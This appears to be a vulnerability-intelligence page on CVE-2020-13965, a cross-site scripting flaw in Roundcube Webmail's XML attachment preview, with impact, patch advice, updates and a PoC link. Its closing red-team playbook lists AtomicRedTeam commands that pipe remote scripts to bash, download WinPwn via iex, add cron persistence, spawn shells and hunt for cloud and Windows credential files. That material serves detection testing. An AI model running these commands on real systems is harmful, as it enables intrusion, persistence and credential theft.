CVE-2020-13965
Overview
This vulnerability is a cross-site scripting (XSS) flaw caused by insufficient input validation of XML attachments in the Roundcube Webmail client. The root cause lies in the handling of text/xml MIME types allowed for message preview, where malicious XML content is processed without proper sanitization. The affected component is the message preview feature in Roundcube Webmail versions prior to 1.3.12 and 1.4.x before 1.4.5.
Vulnerability Description
An issue was discovered in Roundcube Webmail before 1.3.12 and 1.4.x before 1.4.5. There is XSS via a malicious XML attachment because text/xml is among the allowed types for a preview.
Impact
An attacker can execute arbitrary JavaScript in the victim's browser by tricking them into previewing a malicious XML attachment, enabling theft of session tokens, user impersonation, or unauthorized actions within the webmail interface. No authentication is required to send the malicious email, but user interaction is necessary to preview the attachment. This can lead to compromise of user accounts and exposure of sensitive email data, impacting confidentiality and user trust.
Solution
Users should upgrade Roundcube Webmail to version 1.3.12 or 1.4.5 or later as detailed in the Debian security advisory DSA-4700 and Fedora package announcements. The Debian advisory (https://www.debian.org/security/2020/dsa-4700) and Fedora announcements provide patch instructions. The vendor’s GitHub releases page confirms the fixed versions. Applying these updates removes the vulnerable XML preview handling or applies proper sanitization to mitigate the issue.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability in Roundcube Webmail, which allows for cross-site scripting (XSS) through malicious XML attachments, poses a significant risk to users of this widely utilized webmail client. The core issue arises from the fact that the application permits the preview of XML files, specifically those with the MIME type text/xml, without adequate sanitization or validation. This oversight enables an attacker to craft a specially designed XML file that, when opened by a user, executes arbitrary JavaScript code within the context of the user's session. Such execution can lead to unauthorized actions, data theft, or session hijacking, undermining the integrity and confidentiality of user data.
Attack vectors for this vulnerability are straightforward yet effective. An attacker could send a crafted email containing a malicious XML attachment to a target user. Upon opening the attachment in the Roundcube interface, the embedded script would execute, potentially allowing the attacker to manipulate the user’s session or extract sensitive information such as cookies, authentication tokens, or personal data. The ease of exploitation is particularly concerning, as it does not require sophisticated techniques or extensive knowledge of the target environment. Furthermore, the reliance on users to recognize and avoid malicious attachments adds another layer of risk, as many users may not be vigilant about the content of attachments they receive.
The real-world impact of this vulnerability can be severe, especially for organizations that rely on Roundcube Webmail for communication. Successful exploitation could lead to data breaches, loss of sensitive information, and compromise of user accounts. For businesses, the repercussions can extend beyond immediate financial losses; they may face reputational damage, regulatory scrutiny, and potential legal liabilities if customer data is exposed. Additionally, the presence of this vulnerability in widely used distributions like Debian and Fedora increases the attack surface, as many organizations may not be aware of the risks associated with their email systems.
To detect and mitigate the risks associated with this vulnerability, organizations should implement several strategies. First, they should ensure that their Roundcube installations are updated to the latest versions, which include patches addressing this issue. Regularly updating software is a fundamental practice in cybersecurity that helps protect against known vulnerabilities. Additionally, organizations can enhance their email filtering capabilities to identify and block potentially harmful attachments before they reach users. Employing security awareness training for employees can also be beneficial, educating them about the risks of opening unsolicited attachments and recognizing phishing attempts.
In conclusion, the XSS vulnerability in Roundcube Webmail represents a critical threat that can be exploited through seemingly innocuous XML attachments. The potential for significant business impact underscores the importance of proactive measures, including timely software updates, robust email filtering, and user education. By addressing this vulnerability, organizations can better protect their data and maintain the trust of their users.
Recent developments in the CVE-2020-13965 vulnerability have significantly altered its threat profile. CSURFACE threat intelligence has identified the emergence of publicly available proof-of-concept exploit code hosted on GitHub, marking a critical shift from theoretical risk to practical exploitability. Concurrently, this vulnerability has been officially added to the CISA Known Exploited Vulnerabilities (KEV) catalog, underscoring its recognition at the federal cybersecurity level and signaling an elevated priority for mitigation efforts. Our telemetry indicates a marked increase in exploit-related activity, reflected in the vulnerability’s EPSS score rising to a high percentile, which suggests growing attacker interest and potential weaponization. The CVSS score adjustment to 6.1 further aligns with this heightened risk, emphasizing the medium-severity impact of cross-site scripting via malicious XML attachments in Roundcube Webmail. For defenders, these changes translate into an urgent need to reassess exposure and prioritize patching or compensating controls, as the availability of exploit code lowers the barrier for adversaries to conduct targeted attacks. The evolving exploit landscape amplifies the likelihood of exploitation in operational environments, increasing the risk of data compromise and session hijacking through this vector.
Update 2 — May 20, 2026
The recent adjustment of the CVSS score for CVE-2020-13965 from 6.1 to 6.3, coupled with its inclusion in the Known Exploited Vulnerabilities (KEV) catalog as of late June 2024, signals an elevated recognition of the vulnerability’s operational risk. While the severity rating remains medium, this formal acknowledgment by authoritative vulnerability tracking entities underscores the potential for adversaries to leverage the cross-site scripting flaw via malicious XML attachments in Roundcube Webmail. CSURFACE threat intelligence notes that the exploitability remains high, supported by stable EPSS scoring in the upper percentiles and the availability of public proof-of-concept exploits. Although ransomware usage linked to this vulnerability is currently unconfirmed, the KEV listing typically accelerates attacker focus and may increase opportunistic exploitation attempts. Consequently, defenders should interpret this update as a heightened threat posture that warrants closer monitoring and reassessment of exposure, as the vulnerability’s practical impact and ease of exploitation have gained broader validation in the threat landscape.
Affected Products (6)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Roundcube | Webmail | All |
cpe:2.3:a:roundcube:webmail:*:*:*:*:*:*:*:*
|
|
|
Roundcube | Webmail | All |
cpe:2.3:a:roundcube:webmail:*:*:*:*:*:*:*:*
|
|
|
Debian | Debian Linux | 9.0 |
cpe:2.3:o:debian:debian_linux:9.0:*:*:*:*:*:*:*
|
|
|
Debian | Debian Linux | 10.0 |
cpe:2.3:o:debian:debian_linux:10.0:*:*:*:*:*:*:*
|
|
|
Fedoraproject | Fedora | 31 |
cpe:2.3:o:fedoraproject:fedora:31:*:*:*:*:*:*:*
|
|
|
Fedoraproject | Fedora | 32 |
cpe:2.3:o:fedoraproject:fedora:32:*:*:*:*:*:*:*
|
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
GitHub PoCs (1)
| Repository | Author | Stars | Forks | Date | Link |
|---|---|---|---|---|---|
|
mbadanoiu/CVE-2020-13965
CVE-2020-13965: Cross-Site Scripting via Malicious XML Attachment in Roundcube Webmail
|
mbadanoiu | 0 | 0 | 2024-04-13 | View |
Threat Feed
4 eventsSighting activity recorded
Sighting activity recorded
CISA confirmed active exploitation — added to Known Exploited Vulnerabilities catalog
Proof-of-concept code is publicly available for this vulnerability
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
Red Team Playbook
47 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
echo "#{command}" > /etc/cron.d/#{cron_script_name}
echo "#{command}" >> /var/spool/cron/crontabs/#{cron_script_name}
echo "#{command}" > /etc/cron.daily/#{cron_script_name}
echo "#{command}" > /etc/cron.hourly/#{cron_script_name}
echo "#{command}" > /etc/cron.monthly/#{cron_script_name}
echo "#{command}" > /etc/cron.weekly/#{cron_script_name}
crontab -l > /tmp/notevil
echo "* * * * * #{command}" > #{tmp_cron} && crontab #{tmp_cron}
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.